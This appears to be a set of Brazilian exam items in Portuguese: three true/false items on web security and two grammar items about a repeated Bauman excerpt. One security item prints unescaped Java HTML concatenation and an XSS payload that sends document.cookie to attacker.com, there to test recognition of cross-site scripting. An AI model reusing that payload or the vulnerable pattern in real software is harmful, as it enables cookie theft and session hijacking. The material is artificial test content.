Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.

Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.

Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.

Considere que uma aplicação use a seguinte informação não confiável na construção do HTML, sem validação ou escaping.

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter ("CC") + "'>";

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.

><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.

Quando eu era criança (e isso aconteceu em outro tempo e em outro espaço), não era incomum ouvir a pergunta “Quão longe é daqui até lá?” respondida por um “Mais ou menos uma hora, ou um pouco menos se você caminhar rápido”. Num tempo ainda anterior à minha infância, suponho que a resposta mais comum teria sido “Se você sair agora, estará lá por volta do meio-dia” ou “Melhor sair agora, se você quiser chegar antes que escureça”. Hoje em dia, pode-se ouvir ocasionalmente essas respostas. Mas serão normalmente precedidas por uma solicitação para ser mais específico: “Você vai de carro ou a pé?”.

“Longe” e “tarde”, assim como “perto” e “cedo”, significavam quase a mesma coisa: exatamente quanto esforço seria necessário para que um ser humano percorresse uma certa distância — fosse caminhando, semeando ou arando. Se as pessoas fossem instadas a explicar o que entendiam por “espaço” e “tempo”, poderiam ter dito que “espaço” é o que se pode percorrer em certo tempo, e que “tempo” é o que se precisa para percorrê-lo. Se não fossem muito pressionados, porém, não entrariam no jogo da definição. E por que deveriam? A maioria das coisas que fazem parte da vida cotidiana são compreendidas razoavelmente até que se precise defini-las; e, a menos que solicitados, não precisaríamos defini-las. O modo como compreendíamos essas coisas que hoje tendemos a chamar de “espaço” e “tempo” era não apenas satisfatório, mas tão preciso quanto necessário, pois era o wetware — os humanos, os bois e os cavalos — que fazia o esforço e punha os limites. Um par de pernas humanas pode ser diferente de outros, mas a substituição de um par por outro não faria uma diferença suficientemente grande para requerer outras medidas além da capacidade dos músculos humanos.

Zygmunt Bauman. A modernidade como história do tempo. In: Modernidade líquida. Plínio Dentzien (Trad.). Rio de Janeiro: Zahar, 2001 (com adaptações).

A respeito das ideias e dos aspectos linguísticos do texto anterior, julgue o item seguinte.

No trecho “Um par de pernas humanas pode ser diferente de outros, mas a substituição de um par por outro não faria uma diferença suficientemente grande para requerer outras medidas além da capacidade dos músculos humanos”, no último período do texto, a substituição de “mas” por entretanto manteria a correção gramatical e a coerência do texto.

Quando eu era criança (e isso aconteceu em outro tempo e em outro espaço), não era incomum ouvir a pergunta “Quão longe é daqui até lá?” respondida por um “Mais ou menos uma hora, ou um pouco menos se você caminhar rápido”. Num tempo ainda anterior à minha infância, suponho que a resposta mais comum teria sido “Se você sair agora, estará lá por volta do meio-dia” ou “Melhor sair agora, se você quiser chegar antes que escureça”. Hoje em dia, pode-se ouvir ocasionalmente essas respostas. Mas serão normalmente precedidas por uma solicitação para ser mais específico: “Você vai de carro ou a pé?”.

“Longe” e “tarde”, assim como “perto” e “cedo”, significavam quase a mesma coisa: exatamente quanto esforço seria necessário para que um ser humano percorresse uma certa distância — fosse caminhando, semeando ou arando. Se as pessoas fossem instadas a explicar o que entendiam por “espaço” e “tempo”, poderiam ter dito que “espaço” é o que se pode percorrer em certo tempo, e que “tempo” é o que se precisa para percorrê-lo. Se não fossem muito pressionados, porém, não entrariam no jogo da definição. E por que deveriam? A maioria das coisas que fazem parte da vida cotidiana são compreendidas razoavelmente até que se precise defini-las; e, a menos que solicitados, não precisaríamos defini-las. O modo como compreendíamos essas coisas que hoje tendemos a chamar de “espaço” e “tempo” era não apenas satisfatório, mas tão preciso quanto necessário, pois era o wetware — os humanos, os bois e os cavalos — que fazia o esforço e punha os limites. Um par de pernas humanas pode ser diferente de outros, mas a substituição de um par por outro não faria uma diferença suficientemente grande para requerer outras medidas além da capacidade dos músculos humanos.

Zygmunt Bauman. A modernidade como história do tempo. In: Modernidade líquida. Plínio Dentzien (Trad.). Rio de Janeiro: Zahar, 2001 (com adaptações).

A respeito das ideias e dos aspectos linguísticos do texto anterior, julgue o item seguinte.

A próclise observada em “se pode percorrer” e “se precisa”, no segundo período do segundo parágrafo do texto, é opcional, de modo que o emprego da ênclise nesses dois casos também seria correto: pode-se percorrer e precisa-se, respectivamente.